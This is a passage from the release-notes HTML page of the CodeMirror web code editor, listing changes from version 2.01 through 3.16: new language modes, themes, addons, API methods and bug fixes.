<li>New themes: <a href="../demo/theme.html#paraiso-dark">Paraiso</a> (<a href="../demo/theme.html#paraiso-light">light</a>), <a href="../demo/theme.html#the-matrix">The Matrix</a>.</li>
<li>Improved interaction between themes and <a href="manual.html#addon_active-line">active-line</a>/<a href="manual.html#addon_matchbrackets">matchbrackets</a> addons.</li>
<li>New <a href="manual.html#addon_foldcode">folding</a> function <code>CodeMirror.fold.comment</code>.</li>
<li>Added <a href="manual.html#addon_fullscreen">fullscreen</a> addon.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/3.15.0...3.16.0">list of patches</a>.</li>
</ul>
<p class="rel">29-07-2013: <a href="http://codemirror.net/codemirror-3.15.zip">Version 3.15</a>:</p>
<ul class="rel-note">
<li>New modes: <a href="../mode/jade/index.html">Jade</a>, <a href="../mode/nginx/index.html">Nginx</a>.</li>
<li>New addons: <a href="../demo/tern.html">Tern</a>, <a href="manual.html#addon_matchtags">matchtags</a>, and <a href="manual.html#addon_foldgutter">foldgutter</a>.</li>
<li>Introduced <a href="manual.html#getHelper"><em>helper</em></a> concept (<a href="https://groups.google.com/forum/#!msg/codemirror/cOc0xvUUEUU/nLrX1-qnidgJ">context</a>).</li>
<li>New method: <a href="manual.html#getModeAt"><code>getModeAt</code></a>.</li>
<li>New themes: base16 <a href="../demo/theme.html#base16-dark">dark</a>/<a href="../demo/theme.html#base16-light">light</a>, 3024 <a href="../demo/theme.html#3024-night">dark</a>/<a href="../demo/theme.html#3024-day">light</a>, <a href="../demo/theme.html#tomorrow-night-eighties">tomorrow-night</a>.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/3.14.0...3.15.0">list of patches</a>.</li>
</ul>
<p class="rel">20-06-2013: <a href="http://codemirror.net/codemirror-3.14.zip">Version 3.14</a>:</p>
<ul class="rel-note">
<li>New
addons: <a href="manual.html#addon_trailingspace">trailing
space highlight</a>, <a href="manual.html#addon_xml-hint">XML
completion</a> (rewritten),
and <a href="manual.html#addon_merge">diff merging</a>.</li>
<li><a href="manual.html#markText"><code>markText</code></a>
and <a href="manual.html#addLineWidget"><code>addLineWidget</code></a>
now take a <code>handleMouseEvents</code> option.</li>
<li>New methods: <a href="manual.html#lineAtHeight"><code>lineAtHeight</code></a>,
<a href="manual.html#getTokenTypeAt"><code>getTokenTypeAt</code></a>.</li>
<li>More precise cleanness-tracking
using <a href="manual.html#changeGeneration"><code>changeGeneration</code></a>
and <a href="manual.html#isClean"><code>isClean</code></a>.</li>
<li>Many extensions to <a href="../demo/emacs.html">Emacs</a> mode
(prefixes, more navigation units, and more).</li>
<li>New
events <a href="manual.html#event_keyHandled"><code>"keyHandled"</code></a>
and <a href="manual.html#event_inputRead"><code>"inputRead"</code></a>.</li>
<li>Various improvements to <a href="../mode/ruby/index.html">Ruby</a>,
<a href="../mode/smarty/index.html">Smarty</a>, <a href="../mode/sql/index.html">SQL</a>,
and <a href="../demo/vim.html">Vim</a> modes.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/3.13.0...3.14.0">list of patches</a>.</li>
</ul>
<p class="rel">20-05-2013: <a href="http://codemirror.net/codemirror-3.13.zip">Version 3.13</a>:</p>
<ul class="rel-note">
<li>New modes: <a href="../mode/cobol/index.html">COBOL</a> and <a href="../mode/haml/index.html">HAML</a>.</li>
<li>New options: <a href="manual.html#option_cursorScrollMargin"><code>cursorScrollMargin</code></a> and <a href="manual.html#option_coverGutterNextToScrollbar"><code>coverGutterNextToScrollbar</code></a>.</li>
<li>New addon: <a href="manual.html#addon_comment">commenting</a>.</li>
<li>More features added to the <a href="../demo/vim.html">Vim keymap</a>.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/v3.12...3.13.0">list of patches</a>.</li>
</ul>
<p class="rel">19-04-2013: <a href="http://codemirror.net/codemirror-3.12.zip">Version 3.12</a>:</p>
<ul class="rel-note">
<li>New mode: <a href="../mode/gas/index.html">GNU assembler</a>.</li>
<li>New
options: <a href="manual.html#option_maxHighlightLength"><code>maxHighlightLength</code></a>
and <a href="manual.html#option_historyEventDelay"><code>historyEventDelay</code></a>.</li>
<li>Added <a href="manual.html#mark_addToHistory"><code>addToHistory</code></a>
option for <code>markText</code>.</li>
<li>Various fixes to JavaScript tokenization and indentation corner cases.</li>
<li>Further improvements to the vim mode.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/v3.11...v3.12">list of patches</a>.</li>
</ul>
<p class="rel">20-03-2013: <a href="http://codemirror.net/codemirror-3.11.zip">Version 3.11</a>:</p>
<ul class="rel-note">
<li><strong>Removed code:</strong> <code>collapserange</code>,
<code>formatting</code>, and <code>simple-hint</code>
addons. <code>plsql</code> and <code>mysql</code> modes
(use <a href="../mode/sql/index.html"><code>sql</code></a> mode).</li>
<li><strong>Moved code:</strong> the range-finding functions for folding now have <a href="../addon/fold/">their own files</a>.</li>
<li><strong>Changed interface:</strong>
the <a href="manual.html#addon_continuecomment"><code>continuecomment</code></a>
addon now exposes an option, rather than a command.</li>
<li>New
modes: <a href="../mode/css/scss.html">SCSS</a>, <a href="../mode/tcl/index.html">Tcl</a>, <a href="../mode/livescript/index.html">LiveScript</a>,
and <a href="../mode/mirc/index.html">mIRC</a>.</li>
<li>New addons: <a href="../demo/placeholder.html"><code>placeholder</code></a>, <a href="../demo/html5complete.html">HTML completion</a>.</li>
<li>New
methods: <a href="manual.html#hasFocus"><code>hasFocus</code></a>, <a href="manual.html#defaultCharWidth"><code>defaultCharWidth</code></a>.</li>
<li>New events: <a href="manual.html#event_beforeCursorEnter"><code>beforeCursorEnter</code></a>, <a href="manual.html#event_renderLine"><code>renderLine</code></a>.</li>
<li>Many improvements to the <a href="manual.html#addon_show-hint"><code>show-hint</code></a> completion
dialog addon.</li>
<li>Tweak behavior of by-word cursor motion.</li>
<li>Further improvements to the <a href="../demo/vim.html">vim mode</a>.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/v3.1...v3.11">list of patches</a>.</li>
</ul>
<p class="rel">21-02-2013: <a href="http://codemirror.net/codemirror-3.1.zip">Version 3.1</a>:</p>
<ul class="rel-note">
<li><strong>Incompatible:</strong> key handlers may
now <em>return</em>, rather
than <em>throw</em> <code>CodeMirror.Pass</code> to signal they
didn't handle the key.</li>
<li>Make documents a <a href="manual.html#api_doc">first-class
construct</a>, support split views and subviews.</li>
<li>Add a <a href="manual.html#addon_show-hint">new module</a>
for showing completion hints.
Deprecate <code>simple-hint.js</code>.</li>
<li>Extend <a href="../mode/htmlmixed/index.html">htmlmixed mode</a>
to allow custom handling of script types.</li>
<li>Support an <code>insertLeft</code> option
to <a href="manual.html#setBookmark"><code>setBookmark</code></a>.</li>
<li>Add an <a href="manual.html#eachLine"><code>eachLine</code></a>
method to iterate over a document.</li>
<li>New addon modules: <a href="../demo/markselection.html">selection
marking</a>, <a href="../demo/lint.html">linting</a>,
and <a href="../demo/closebrackets.html">automatic bracket
closing</a>.</li>
<li>Add <a href="manual.html#event_beforeChange"><code>"beforeChange"</code></a>
and <a href="manual.html#event_beforeSelectionChange"><code>"beforeSelectionChange"</code></a>
events.</li>
<li>Add <a href="manual.html#event_hide"><code>"hide"</code></a>
and <a href="manual.html#event_unhide"><code>"unhide"</code></a>
events to marked ranges.</li>
<li>Fix <a href="manual.html#coordsChar"><code>coordsChar</code></a>'s
interpretation of its argument to match the documentation.</li>
<li>New modes: <a href="../mode/turtle/index.html">Turtle</a>
and <a href="../mode/q/index.html">Q</a>.</li>
<li>Further improvements to the <a href="../demo/vim.html">vim mode</a>.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/v3.01...v3.1">list of patches</a>.</li>
</ul>
<p class="rel">25-01-2013: <a href="http://codemirror.net/codemirror-3.02.zip">Version 3.02</a>:</p>
<p class="rel-note">Single-bugfix release. Fixes a problem that
prevents CodeMirror instances from being garbage-collected after
they become unused.</p>
<p class="rel">21-01-2013: <a href="http://codemirror.net/codemirror-3.01.zip">Version 3.01</a>:</p>
<ul class="rel-note">
<li>Move all add-ons into an organized directory structure
under <a href="../addon/"><code>/addon</code></a>. <strong>You might have to adjust your
paths.</strong></li>
<li>New
modes: <a href="../mode/d/index.html">D</a>, <a href="../mode/sass/index.html">Sass</a>, <a href="../mode/apl/index.html">APL</a>, <a href="../mode/sql/index.html">SQL</a>
(configurable), and <a href="../mode/asterisk/index.html">Asterisk</a>.</li>
<li>Several bugfixes in right-to-left text support.</li>
<li>Add <a href="manual.html#option_rtlMoveVisually"><code>rtlMoveVisually</code></a> option.</li>
<li>Improvements to vim keymap.</li>
<li>Add built-in (lightweight) <a href="manual.html#addOverlay">overlay mode</a> support.</li>
<li>Support <code>showIfHidden</code> option for <a href="manual.html#addLineWidget">line widgets</a>.</li>
<li>Add simple <a href="manual.html#addon_python-hint">Python hinter</a>.</li>
<li>Bring back the <a href="manual.html#option_fixedGutter"><code>fixedGutter</code></a> option.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/v3.0...v3.01">list of patches</a>.</li>
</ul>
<p class="rel">10-12-2012: <a href="http://codemirror.net/codemirror-3.0.zip">Version 3.0</a>:</p>
<p class="rel-note"><strong>New major version</strong>. Only
partially backwards-compatible. See
the <a href="upgrade_v3.html">upgrading guide</a> for more
information. Changes since release candidate 2:</p>
<ul class="rel-note">
<li>Rewritten VIM mode.</li>
<li>Fix a few minor scrolling and sizing issues.</li>
<li>Work around Safari segfault when dragging.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/v3.0rc2...v3.0">list of patches</a>.</li>
</ul>
<p class="rel">20-11-2012: <a href="http://codemirror.net/codemirror-3.0rc2.zip">Version 3.0, release candidate 2</a>:</p>
<ul class="rel-note">
<li>New mode: <a href="../mode/http/index.html">HTTP</a>.</li>
<li>Improved handling of selection anchor position.</li>
<li>Improve IE performance on longer lines.</li>
<li>Reduce gutter glitches during horiz. scrolling.</li>
<li>Add <a href="manual.html#addKeyMap"><code>addKeyMap</code></a> and <a href="manual.html#removeKeyMap"><code>removeKeyMap</code></a> methods.</li>
<li>Rewrite <code>formatting</code> and <code>closetag</code> add-ons.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/v3.0rc1...v3.0rc2">list of patches</a>.</li>
</ul>
<p class="rel">20-11-2012: <a href="http://codemirror.net/codemirror-3.0rc1.zip">Version 3.0, release candidate 1</a>:</p>
<ul class="rel-note">
<li>New theme: <a href="../demo/theme.html#solarized%20light">Solarized</a>.</li>
<li>Introduce <a href="manual.html#addLineClass"><code>addLineClass</code></a>
and <a href="manual.html#removeLineClass"><code>removeLineClass</code></a>,
drop <code>setLineClass</code>.</li>
<li>Add a <em>lot</em> of
new <a href="manual.html#markText">options for marked text</a>
(read-only, atomic, collapsed, widget replacement).</li>
<li>Remove the old code folding interface in favour of these new ranges.</li>
<li>Add <a href="manual.html#isClean"><code>isClean</code></a>/<a href="manual.html#markClean"><code>markClean</code></a> methods.</li>
<li>Remove <code>compoundChange</code> method, use better undo-event-combining heuristic.</li>
<li>Improve scrolling performance smoothness.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/v3.0beta2...v3.0rc1">list of patches</a>.</li>
</ul>
<p class="rel">22-10-2012: <a href="http://codemirror.net/codemirror-3.0beta2.zip">Version 3.0, beta 2</a>:</p>
<ul class="rel-note">
<li>Fix page-based coordinate computation.</li>
<li>Fix firing of <a href="manual.html#event_gutterClick"><code>gutterClick</code></a> event.</li>
<li>Add <a href="manual.html#option_cursorHeight"><code>cursorHeight</code></a> option.</li>
<li>Fix bi-directional text regression.</li>
<li>Add <a href="manual.html#option_viewportMargin"><code>viewportMargin</code></a> option.</li>
<li>Directly handle mousewheel events (again, hopefully better).</li>
<li>Make vertical cursor movement more robust (through widgets, big line gaps).</li>
<li>Add <a href="manual.html#option_flattenSpans"><code>flattenSpans</code></a> option.</li>
<li>Many optimizations. Poor responsiveness should be fixed.</li>
<li>Initialization in hidden state works again.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/v3.0beta1...v3.0beta2">list of patches</a>.</li>
</ul>
<p class="rel">19-09-2012: <a href="http://codemirror.net/codemirror-3.0beta1.zip">Version 3.0, beta 1</a>:</p>
<ul class="rel-note">
<li>Bi-directional text support.</li>
<li>More powerful gutter model.</li>
<li>Support for arbitrary text/widget height.</li>
<li>In-line widgets.</li>
<li>Generalized event handling.</li>
</ul>
</section>
<section id=v2>
<h2>Version 2.x</h2>
<p class="rel">21-01-2013: <a href="http://codemirror.net/codemirror-2.38.zip">Version 2.38</a>:</p>
<p class="rel-note">Integrate some bugfixes, enhancements to the vim keymap, and new
modes
(<a href="../mode/d/index.html">D</a>, <a href="../mode/sass/index.html">Sass</a>, <a href="../mode/apl/index.html">APL</a>)
from the v3 branch.</p>
<p class="rel">20-12-2012: <a href="http://codemirror.net/codemirror-2.37.zip">Version 2.37</a>:</p>
<ul class="rel-note">
<li>New mode: <a href="../mode/sql/index.html">SQL</a> (will replace <a href="../mode/plsql/index.html">plsql</a> and <a href="../mode/mysql/index.html">mysql</a> modes).</li>
<li>Further work on the new VIM mode.</li>
<li>Fix Cmd/Ctrl keys on recent Operas on OS X.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/v2.36...v2.37">list of patches</a>.</li>
</ul>
<p class="rel">20-11-2012: <a href="http://codemirror.net/codemirror-2.36.zip">Version 2.36</a>:</p>
<ul class="rel-note">
<li>New mode: <a href="../mode/z80/index.html">Z80 assembly</a>.</li>
<li>New theme: <a href="../demo/theme.html#twilight">Twilight</a>.</li>
<li>Add command-line compression helper.</li>
<li>Make <a href="manual.html#scrollIntoView"><code>scrollIntoView</code></a> public.</li>
<li>Add <a href="manual.html#defaultTextHeight"><code>defaultTextHeight</code></a> method.</li>
<li>Various extensions to the vim keymap.</li>
<li>Make <a href="../mode/php/index.html">PHP mode</a> build on <a href="../mode/htmlmixed/index.html">mixed HTML mode</a>.</li>
<li>Add <a href="manual.html#addon_continuecomment">comment-continuing</a> add-on.</li>
<li>Full <a href="../https://github.com/codemirror/CodeMirror/compare/v2.35...v2.36">list of patches</a>.</li>
</ul>
<p class="rel">22-10-2012: <a href="http://codemirror.net/codemirror-2.35.zip">Version 2.35</a>:</p>
<ul class="rel-note">
<li>New (sub) mode: <a href="../mode/javascript/typescript.html">TypeScript</a>.</li>
<li>Don't overwrite (insert key) when pasting.</li>
<li>Fix several bugs in <a href="manual.html#markText"><code>markText</code></a>/undo interaction.</li>
<li>Better indentation of JavaScript code without semicolons.</li>
<li>Add <a href="manual.html#defineInitHook"><code>defineInitHook</code></a> function.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/v2.34...v2.35">list of patches</a>.</li>
</ul>
<p class="rel">19-09-2012: <a href="http://codemirror.net/codemirror-2.34.zip">Version 2.34</a>:</p>
<ul class="rel-note">
<li>New mode: <a href="../mode/commonlisp/index.html">Common Lisp</a>.</li>
<li>Fix right-click select-all on most browsers.</li>
<li>Change the way highlighting happens:<br> Saves memory and CPU cycles.<br> <code>compareStates</code> is no longer needed.<br> <code>onHighlightComplete</code> no longer works.</li>
<li>Integrate mode (Markdown, XQuery, CSS, sTex) tests in central testsuite.</li>
<li>Add a <a href="manual.html#version"><code>CodeMirror.version</code></a> property.</li>
<li>More robust handling of nested modes in <a href="../demo/formatting.html">formatting</a> and <a href="../demo/closetag.html">closetag</a> plug-ins.</li>
<li>Un/redo now preserves <a href="manual.html#markText">marked text</a> and bookmarks.</li>
<li><a href="https://github.com/codemirror/CodeMirror/compare/v2.33...v2.34">Full list</a> of patches.</li>
</ul>
<p class="rel">23-08-2012: <a href="http://codemirror.net/codemirror-2.33.zip">Version 2.33</a>:</p>
<ul class="rel-note">
<li>New mode: <a href="../mode/sieve/index.html">Sieve</a>.</li>
<li>New <a href="manual.html#getViewport"><code>getViewPort</code></a> and <a href="manual.html#option_onViewportChange"><code>onViewportChange</code></a> API.</li>
<li><a href="manual.html#option_cursorBlinkRate">Configurable</a> cursor blink rate.</li>
<li>Make binding a key to <code>false</code> disabling handling (again).</li>
<li>Show non-printing characters as red dots.</li>
<li>More tweaks to the scrolling model.</li>
<li>Expanded testsuite. Basic linter added.</li>
<li>Remove most uses of <code>innerHTML</code>. Remove <code>CodeMirror.htmlEscape</code>.</li>
<li><a href="https://github.com/codemirror/CodeMirror/compare/v2.32...v2.33">Full list</a> of patches.</li>
</ul>
<p class="rel">23-07-2012: <a href="http://codemirror.net/codemirror-2.32.zip">Version 2.32</a>:</p>
<p class="rel-note">Emergency fix for a bug where an editor with
line wrapping on IE will break when there is <em>no</em>
scrollbar.</p>
<p class="rel">20-07-2012: <a href="http://codemirror.net/codemirror-2.31.zip">Version 2.31</a>:</p>
<ul class="rel-note">
<li>New modes: <a href="../mode/ocaml/index.html">OCaml</a>, <a href="../mode/haxe/index.html">Haxe</a>, and <a href="../mode/vb/index.html">VB.NET</a>.</li>
<li>Several fixes to the new scrolling model.</li>
<li>Add a <a href="manual.html#setSize"><code>setSize</code></a> method for programmatic resizing.</li>
<li>Add <a href="manual.html#getHistory"><code>getHistory</code></a> and <a href="manual.html#setHistory"><code>setHistory</code></a> methods.</li>
<li>Allow custom line separator string in <a href="manual.html#getValue"><code>getValue</code></a> and <a href="manual.html#getRange"><code>getRange</code></a>.</li>
<li>Support double- and triple-click drag, double-clicking whitespace.</li>
<li>And more... <a href="https://github.com/codemirror/CodeMirror/compare/v2.3...v2.31">(all patches)</a></li>
</ul>
<p class="rel">22-06-2012: <a href="http://codemirror.net/codemirror-2.3.zip">Version 2.3</a>:</p>
<ul class="rel-note">
<li><strong>New scrollbar implementation</strong>. Should flicker less. Changes DOM structure of the editor.</li>
<li>New theme: <a href="../demo/theme.html#vibrant-ink">vibrant-ink</a>.</li>
<li>Many extensions to the VIM keymap (including text objects).</li>
<li>Add <a href="../demo/multiplex.html">mode-multiplexing</a> utility script.</li>
<li>Fix bug where right-click paste works in read-only mode.</li>
<li>Add a <a href="manual.html#getScrollInfo"><code>getScrollInfo</code></a> method.</li>
<li>Lots of other <a href="https://github.com/codemirror/CodeMirror/compare/v2.25...v2.3">fixes</a>.</li>
</ul>
<p class="rel">23-05-2012: <a href="http://codemirror.net/codemirror-2.25.zip">Version 2.25</a>:</p>
<ul class="rel-note">
<li>New mode: <a href="../mode/erlang/index.html">Erlang</a>.</li>
<li><strong>Remove xmlpure mode</strong> (use <a href="../mode/xml/index.html">xml.js</a>).</li>
<li>Fix line-wrapping in Opera.</li>
<li>Fix X Windows middle-click paste in Chrome.</li>
<li>Fix bug that broke pasting of huge documents.</li>
<li>Fix backspace and tab key repeat in Opera.</li>
</ul>
<p class="rel">23-04-2012: <a href="http://codemirror.net/codemirror-2.24.zip">Version 2.24</a>:</p>
<ul class="rel-note">
<li><strong>Drop support for Internet Explorer 6</strong>.</li>
<li>New
modes: <a href="../mode/shell/index.html">Shell</a>, <a href="../mode/tiki/index.html">Tiki
wiki</a>, <a href="../mode/pig/index.html">Pig Latin</a>.</li>
<li>New themes: <a href="../demo/theme.html#ambiance">Ambiance</a>, <a href="../demo/theme.html#blackboard">Blackboard</a>.</li>
<li>More control over drag/drop
with <a href="manual.html#option_dragDrop"><code>dragDrop</code></a>
and <a href="manual.html#option_onDragEvent"><code>onDragEvent</code></a>
options.</li>
<li>Make HTML mode a bit less pedantic.</li>
<li>Add <a href="manual.html#compoundChange"><code>compoundChange</code></a> API method.</li>
<li>Several fixes in undo history and line hiding.</li>
<li>Remove (broken) support for <code>catchall</code> in key maps,
add <code>nofallthrough</code> boolean field instead.</li>
</ul>
<p class="rel">26-03-2012: <a href="http://codemirror.net/codemirror-2.23.zip">Version 2.23</a>:</p>
<ul class="rel-note">
<li>Change <strong>default binding for tab</strong> <a href="javascript:void(document.getElementById('tabbinding').style.display='')">[more]</a>
<div style="display: none" id=tabbinding>
Starting in 2.23, these bindings are default:
<ul><li>Tab: Insert tab character</li>
<li>Shift-tab: Reset line indentation to default</li>
<li>Ctrl/Cmd-[: Reduce line indentation (old tab behaviour)</li>
<li>Ctrl/Cmd-]: Increase line indentation (old shift-tab behaviour)</li>
</ul>
</div>
</li>
<li>New modes: <a href="../mode/xquery/index.html">XQuery</a> and <a href="../mode/vbscript/index.html">VBScript</a>.</li>
<li>Two new themes: <a href="../mode/less/index.html">lesser-dark</a> and <a href="../mode/xquery/index.html">xq-dark</a>.</li>
<li>Differentiate between background and text styles in <a href="manual.html#setLineClass"><code>setLineClass</code></a>.</li>
<li>Fix drag-and-drop in IE9+.</li>
<li>Extend <a href="manual.html#charCoords"><code>charCoords</code></a>
and <a href="manual.html#cursorCoords"><code>cursorCoords</code></a> with a <code>mode</code> argument.</li>
<li>Add <a href="manual.html#option_autofocus"><code>autofocus</code></a> option.</li>
<li>Add <a href="manual.html#findMarksAt"><code>findMarksAt</code></a> method.</li>
</ul>
<p class="rel">27-02-2012: <a href="http://codemirror.net/codemirror-2.22.zip">Version 2.22</a>:</p>
<ul class="rel-note">
<li>Allow <a href="manual.html#keymaps">key handlers</a> to pass up events, allow binding characters.</li>
<li>Add <a href="manual.html#option_autoClearEmptyLines"><code>autoClearEmptyLines</code></a> option.</li>
<li>Properly use tab stops when rendering tabs.</li>
<li>Make PHP mode more robust.</li>
<li>Support indentation blocks in <a href="manual.html#addon_foldcode">code folder</a>.</li>
<li>Add a script for <a href="manual.html#addon_match-highlighter">highlighting instances of the selection</a>.</li>
<li>New <a href="../mode/properties/index.html">.properties</a> mode.</li>
<li>Fix many bugs.</li>
</ul>
<p class="rel">27-01-2012: <a href="http://codemirror.net/codemirror-2.21.zip">Version 2.21</a>:</p>
<ul class="rel-note">
<li>Added <a href="../mode/less/index.html">LESS</a>, <a href="../mode/mysql/index.html">MySQL</a>,
<a href="../mode/go/index.html">Go</a>, and <a href="../mode/verilog/index.html">Verilog</a> modes.</li>
<li>Add <a href="manual.html#option_smartIndent"><code>smartIndent</code></a>
option.</li>
<li>Support a cursor in <a href="manual.html#option_readOnly"><code>readOnly</code></a>-mode.</li>
<li>Support assigning multiple styles to a token.</li>
<li>Use a new approach to drawing the selection.</li>
<li>Add <a href="manual.html#scrollTo"><code>scrollTo</code></a> method.</li>
<li>Allow undo/redo events to span non-adjacent lines.</li>
<li>Lots and lots of bugfixes.</li>
</ul>
<p class="rel">20-12-2011: <a href="http://codemirror.net/codemirror-2.2.zip">Version 2.2</a>:</p>
<ul class="rel-note">
<li>Slightly incompatible API changes. Read <a href="upgrade_v2.2.html">this</a>.</li>
<li>New approach
to <a href="manual.html#option_extraKeys">binding</a> keys,
support for <a href="manual.html#option_keyMap">custom
bindings</a>.</li>
<li>Support for overwrite (insert).</li>
<li><a href="manual.html#option_tabSize">Custom-width</a>
and <a href="../demo/visibletabs.html">stylable</a> tabs.</li>
<li>Moved more code into <a href="manual.html#addons">add-on scripts</a>.</li>
<li>Support for sane vertical cursor movement in wrapped lines.</li>
<li>More reliable handling of
editing <a href="manual.html#markText">marked text</a>.</li>
<li>Add minimal <a href="../demo/emacs.html">emacs</a>
and <a href="../demo/vim.html">vim</a> bindings.</li>
<li>Rename <code>coordsFromIndex</code>
to <a href="manual.html#posFromIndex"><code>posFromIndex</code></a>,
add <a href="manual.html#indexFromPos"><code>indexFromPos</code></a>
method.</li>
</ul>
<p class="rel">21-11-2011: <a href="http://codemirror.net/codemirror-2.18.zip">Version 2.18</a>:</p>
<p class="rel-note">Fixes <code>TextMarker.clear</code>, which is broken in 2.17.</p>
<p class="rel">21-11-2011: <a href="http://codemirror.net/codemirror-2.17.zip">Version 2.17</a>:</p>
<ul class="rel-note">
<li>Add support for <a href="manual.html#option_lineWrapping">line
wrapping</a> and <a href="manual.html#hideLine">code
folding</a>.</li>
<li>Add <a href="../mode/gfm/index.html">Github-style Markdown</a> mode.</li>
<li>Add <a href="../theme/monokai.css">Monokai</a>
and <a href="../theme/rubyblue.css">Rubyblue</a> themes.</li>
<li>Add <a href="manual.html#setBookmark"><code>setBookmark</code></a> method.</li>
<li>Move some of the demo code into reusable components
under <a href="../addon/"><code>lib/util</code></a>.</li>
<li>Make screen-coord-finding code faster and more reliable.</li>
<li>Fix drag-and-drop in Firefox.</li>
<li>Improve support for IME.</li>
<li>Speed up content rendering.</li>
<li>Fix browser's built-in search in Webkit.</li>
<li>Make double- and triple-click work in IE.</li>
<li>Various fixes to modes.</li>
</ul>
<p class="rel">27-10-2011: <a href="http://codemirror.net/codemirror-2.16.zip">Version 2.16</a>:</p>
<ul class="rel-note">
<li>Add <a href="../mode/perl/index.html">Perl</a>, <a href="../mode/rust/index.html">Rust</a>, <a href="../mode/tiddlywiki/index.html">TiddlyWiki</a>, and <a href="../mode/groovy/index.html">Groovy</a> modes.</li>
<li>Dragging text inside the editor now moves, rather than copies.</li>
<li>Add a <a href="manual.html#coordsFromIndex"><code>coordsFromIndex</code></a> method.</li>
<li><strong>API change</strong>: <code>setValue</code> now no longer clears history. Use <a href="manual.html#clearHistory"><code>clearHistory</code></a> for that.</li>
<li><strong>API change</strong>: <a href="manual.html#markText"><code>markText</code></a> now
returns an object with <code>clear</code> and <code>find</code>
methods. Marked text is now more robust when edited.</li>
<li>Fix editing code with tabs in Internet Explorer.</li>
</ul>
<p class="rel">26-09-2011: <a href="http://codemirror.net/codemirror-2.15.zip">Version 2.15</a>:</p>
<p class="rel-note">Fix bug that snuck into 2.14: Clicking the
character that currently has the cursor didn't re-focus the
editor.</p>
<p class="rel">26-09-2011: <a href="http://codemirror.net/codemirror-2.14.zip">Version 2.14</a>:</p>
<ul class="rel-note">
<li>Add <a href="../mode/clojure/index.html">Clojure</a>, <a href="../mode/pascal/index.html">Pascal</a>, <a href="../mode/ntriples/index.html">NTriples</a>, <a href="../mode/jinja2/index.html">Jinja2</a>, and <a href="../mode/markdown/index.html">Markdown</a> modes.</li>
<li>Add <a href="../theme/cobalt.css">Cobalt</a> and <a href="../theme/eclipse.css">Eclipse</a> themes.</li>
<li>Add a <a href="manual.html#option_fixedGutter"><code>fixedGutter</code></a> option.</li>
<li>Fix bug with <code>setValue</code> breaking cursor movement.</li>
<li>Make gutter updates much more efficient.</li>
<li>Allow dragging of text out of the editor (on modern browsers).</li>
</ul>
<p class="rel">23-08-2011: <a href="http://codemirror.net/codemirror-2.13.zip">Version 2.13</a>:</p>
<ul class="rel-note">
<li>Add <a href="../mode/ruby/index.html">Ruby</a>, <a href="../mode/r/index.html">R</a>, <a href="../mode/coffeescript/index.html">CoffeeScript</a>, and <a href="../mode/velocity/index.html">Velocity</a> modes.</li>
<li>Add <a href="manual.html#getGutterElement"><code>getGutterElement</code></a> to API.</li>
<li>Several fixes to scrolling and positioning.</li>
<li>Add <a href="manual.html#option_smartHome"><code>smartHome</code></a> option.</li>
<li>Add an experimental <a href="../mode/xmlpure/index.html">pure XML</a> mode.</li>
</ul>
<p class="rel">25-07-2011: <a href="http://codemirror.net/codemirror-2.12.zip">Version 2.12</a>:</p>
<ul class="rel-note">
<li>Add a <a href="../mode/sparql/index.html">SPARQL</a> mode.</li>
<li>Fix bug with cursor jumping around in an unfocused editor in IE.</li>
<li>Allow key and mouse events to bubble out of the editor. Ignore widget clicks.</li>
<li>Solve cursor flakiness after undo/redo.</li>
<li>Fix block-reindent ignoring the last few lines.</li>
<li>Fix parsing of multi-line attrs in XML mode.</li>
<li>Use <code>innerHTML</code> for HTML-escaping.</li>
<li>Some fixes to indentation in C-like mode.</li>
<li>Shrink horiz scrollbars when long lines removed.</li>
<li>Fix width feedback loop bug that caused the width of an inner DIV to shrink.</li>
</ul>
<p class="rel">04-07-2011: <a href="http://codemirror.net/codemirror-2.11.zip">Version 2.11</a>:</p>
<ul class="rel-note">
<li>Add a <a href="../mode/scheme/index.html">Scheme mode</a>.</li>
<li>Add a <code>replace</code> method to search cursors, for cursor-preserving replacements.</li>
<li>Make the <a href="../mode/clike/index.html">C-like mode</a> mode more customizable.</li>
<li>Update XML mode to spot mismatched tags.</li>
<li>Add <code>getStateAfter</code> API and <code>compareState</code> mode API methods for finer-grained mode magic.</li>
<li>Add a <code>getScrollerElement</code> API method to manipulate the scrolling DIV.</li>
<li>Fix drag-and-drop for Firefox.</li>
<li>Add a C# configuration for the <a href="../mode/clike/index.html">C-like mode</a>.</li>
<li>Add <a href="../demo/fullscreen.html">full-screen editing</a> and <a href="../demo/changemode.html">mode-changing</a> demos.</li>
</ul>
<p class="rel">07-06-2011: <a href="http://codemirror.net/codemirror-2.1.zip">Version 2.1</a>:</p>
<p class="rel-note">Add
a <a href="manual.html#option_theme">theme</a> system
(<a href="../demo/theme.html">demo</a>). Note that this is not
backwards-compatible—you'll have to update your styles and
modes!</p>
<p class="rel">07-06-2011: <a href="http://codemirror.net/codemirror-2.02.zip">Version 2.02</a>:</p>
<ul class="rel-note">
<li>Add a <a href="../mode/lua/index.html">Lua mode</a>.</li>
<li>Fix reverse-searching for a regexp.</li>
<li>Empty lines can no longer break highlighting.</li>
<li>Rework scrolling model (the outer wrapper no longer does the scrolling).</li>
<li>Solve horizontal jittering on long lines.</li>
<li>Add <a href="../demo/runmode.html">runmode.js</a>.</li>
<li>Immediately re-highlight text when typing.</li>
<li>Fix problem with 'sticking' horizontal scrollbar.</li>
</ul>
<p class="rel">26-05-2011: <a href="http://codemirror.net/codemirror-2.01.zip">Version 2.01</a>:</p>
<ul class="rel-note">
<li>Add a <a href="../mode/smalltalk/index.html">Smalltalk mode</a>.</li>
<li>Add a <a href="../mode/rst/index.html">reStructuredText mode</a>.</li>
<li>Add a <a href="../mode/python/index.html">Python mode</a>.</li>
<li>Add a <a href="../mode/plsql/index.html">PL/SQL mode</a>.</li>
<li><code>coordsChar</code> now works</li>
